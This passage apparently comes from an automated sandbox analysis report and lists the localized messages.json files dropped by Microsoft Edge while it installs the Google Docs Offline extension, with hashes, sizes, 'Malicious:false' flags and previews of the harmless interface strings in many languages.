                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
